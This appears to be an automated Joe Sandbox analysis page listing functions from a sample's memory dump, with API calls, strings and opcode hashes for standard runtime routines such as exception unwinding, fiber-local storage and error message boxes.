Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction ID: 709f9a6250ef0c4ef748471060b9daa144d28ff9e2375aa63cf738b83d15f031
Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction Fuzzy Hash: 83216B72628AC6C2E624AF10F4517EAA374FF84784F905136EA8C43A99DF3CD646CB50

Function 00007FF7691B8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7691B8DC5
GetProcAddress.KERNEL32 ref: 00007FF7691B8DDB
FreeLibrary.KERNEL32 ref: 00007FF7691B8E02

Strings

mscoree.dll, xrefs: 00007FF7691B8DBC
CorExitProcess, xrefs: 00007FF7691B8DD4

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 3f23797772a02f4b2cd3ab0a2a3c6c4da112c766718274bdefd701c5b0b3b59e
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: 52F06221B19702C2EA18AF24F4443799330AF49B61FE40636C96E862F4CF2CD04AC720

Function 00007FF7691C8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7691C86A0
_set_statfp.LIBCMT ref: 00007FF7691C86BB
_set_statfp.LIBCMT ref: 00007FF7691C86D7
_set_statfp.LIBCMT ref: 00007FF7691C8713

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 405a8a5d5e02646b90e43f1e3faac176237b74da9f324872e234f4bdb685bbe3
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: E711BF36E18A13C3F65C3928F5D637982606F54364FF506B4F96F066E69F2CA8429A30

Function 00007FF7691BA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6BF
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA6DE
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA706
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA717
FlsSetValue.KERNEL32(?,?,?,00007FF7691B98B3,?,?,00000000,00007FF7691B9B4E,?,?,?,?,?,00007FF7691B9ADA), ref: 00007FF7691BA728

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
Instruction ID: dd1ff62f630595b6a1cc1e96c42a5fd051ec86a089b1ff38ba40a3f1b78b23b4
Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
Instruction Fuzzy Hash: A7113D21B0C242C2FA5C7B25B551579E1B35F983B0EF84334E83E466EEDE2DA9428761

Function 00007FF7691BA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7691BA545
FlsSetValue.KERNEL32 ref: 00007FF7691BA564
FlsSetValue.KERNEL32 ref: 00007FF7691BA58C
FlsSetValue.KERNEL32 ref: 00007FF7691BA59D
FlsSetValue.KERNEL32 ref: 00007FF7691BA5AE

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
Instruction ID: 795eb78e52bd79cd74cd2637bde607f4aa409ca3a859816f0aa11aec20b55fc2
Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
Instruction Fuzzy Hash: 5711FA20F48207C2FA6C7F25B451579E2A34F59370EF84734D93E0A2DAED2CB6414271

Function 00007FF7691B52B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B52EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B5416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B54CC

Strings

verbose, xrefs: 00007FF7691B52C0

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: 4a0b4dc2d2050787467cca40af6be64adb799304cdf4baca05cb52d3f47d8e20
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: E591B022A0C646C1F76AAF25F45037DB6B2AB04B95FE84136DA5D873D9EE3CE4458320

Function 00007FF7691BEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7691BF1B7

Part of subcall function 00007FF7691B6D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691B6D69

Strings

ccs, xrefs: 00007FF7691BF0F2
UTF-8, xrefs: 00007FF7691BF136
UTF-16LEUNICODE, xrefs: 00007FF7691BF155

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 6bd6da0e4784cef727a130e93b34c6c758fbe33866e409389363374781674e55
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: E481A37AE08203C5F76C7E29E110278B6B3AB11744FF58035DA1A973EDDB2DE905A721

Function 00007FF7691AC968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7691AC993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7691ACA2A
RtlUnwindEx.KERNEL32 ref: 00007FF7691ACA84

Strings

csm, xrefs: 00007FF7691ACA11

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 7ef9ab6b6f7882665af7288478547980de27fb17c7de2eb67ba06ad4590e9d90
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: CC518F32B19642CADF18EF25F444A79B7A1EB44B98FA08131DA5A43B85EF7DEC41C710

Function 00007FF7691AE1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7691AE257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7691AE2A3

Strings

RCC, xrefs: 00007FF7691AE273
MOC, xrefs: 00007FF7691AE26B

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction ID: 4f38563176fc62fbed1f6174cea3b9c63a93e835aa5724d0496b833194f72920
Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction Fuzzy Hash: 21618E32908B85C6EB25AF25F4403AAB7B4FB84784F544225EB9C43B95DF7CE594CB10

Function 00007FF7691AE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7691AE5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7691AE6B8

Strings

csm, xrefs: 00007FF7691AE5F2
csm, xrefs: 00007FF7691AE70A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: 65391e38177a33de5bf5207e9f817f474d889efe7845a00e2f09b942252b0d89
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 2B51A136A08642CAEB68AF61A048378B7B0EB54B94FA44536DA5D43FD1CF3CED50CB51

Function 00007FF7691A7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF7691A324C,?,?,00007FF7691A3964), ref: 00007FF7691A7642

Strings

%s%c, xrefs: 00007FF7691A75B4
%.*s, xrefs: 00007FF7691A75FB
\, xrefs: 00007FF7691A75A7

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction ID: f81caa457b8c00a6ea6cdb965cf09d026ac504dd434ae85c9ba9068ab4a59568
Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction Fuzzy Hash: 0F31B821B19AC5C9FA25AF15F8107A6A274FB44BE0FE44231EA6D43BC9DE2CDA458710

Function 00007FF7691A25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9

MessageBoxW.USER32 ref: 00007FF7691A2686
MessageBoxA.USER32 ref: 00007FF7691A269A

Strings

Error/warning (ANSI fallback), xrefs: 00007FF7691A268E
Error, xrefs: 00007FF7691A2677

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error$Error/warning (ANSI fallback)
API String ID: 1878133881-653037927
Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction ID: 0c7488aba16d5498f09aaa62c641d4c9b372210183e5b25577ab8129fa3ad34a
Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
Instruction Fuzzy Hash: 21115B72628A85C1EB28AF11F451BA9B378FB44B84FE05136DA5D47A44DF3CDA09CB50

Function 00007FF7691BB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7691BB92F
WriteFile.KERNEL32 ref: 00007FF7691BBBF7
WriteFile.KERNEL32 ref: 00007FF7691BBC3D
GetLastError.KERNEL32 ref: 00007FF7691BBCF3

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction ID: f174d3c389e2c0b0b2f8f5f514f608d6f383f6626e70715dcb2cd3081e8b72ff
Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction Fuzzy Hash: 86D11672B08A81C9E714DF79E4802AC77B2FB54798BA44236CE5E97F99DE38D416C310

Function 00007FF7691BEC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7691BED8C
_get_daylight.LIBCMT ref: 00007FF7691BED9D
_get_daylight.LIBCMT ref: 00007FF7691BEDAE
_isindst.LIBCMT ref: 00007FF7691BEE79

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction ID: 84243b513a2ac659c958ae43a10907d50ce1a4eaebe8ab7aaba856db1f947a85
Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
Instruction Fuzzy Hash: 7351D772F04112CAEB1CEF64EA556BCA7B2AB14359FA00135DD1E53AE9DF3CA502C750

Function 00007FF7691B4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF7691B4ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF7691B4B21
GetLastError.KERNEL32 ref: 00007FF7691B4BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7691B49C4), ref: 00007FF7691B4BFE

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction ID: 3b67deaf55b2bf900068082c1cd07fe594c5191187d35b6648dc90dcc298683b
Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction Fuzzy Hash: 9B517C22A08651CAFB18EF71E5503BDA3B2EB48B58FA48535DE0987689DF3CD481C760

Function 00007FF7691A2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7691A2064
SetWindowLongPtrW.USER32 ref: 00007FF7691A2086
GetWindowLongPtrW.USER32 ref: 00007FF7691A20B0
InvalidateRect.USER32 ref: 00007FF7691A20D0

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: dcba193661712412712dde0f1e64ee6958b8336f32026eab4c405f1ba52e37fb
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: F911A921F08142C2FA5DAF6AF64427992B1EF88B80FE49531DE4947F9DCD2CD8C6C624

Function 00007FF7691C4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7691C0A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C0AA3

_get_daylight.LIBCMT ref: 00007FF7691C4F44
_get_daylight.LIBCMT ref: 00007FF7691C4F55

Strings

?, xrefs: 00007FF7691C4ED5

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction ID: 1bf283dd3ee79d78002088e2a418766c89ac584c6f21bf7504ce18dd8197fdbb
Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction Fuzzy Hash: 1E41D512B0C682C6FB28AF25B501779E770EB91BA4FA44235EE5D07AD9DF3CD4418B10

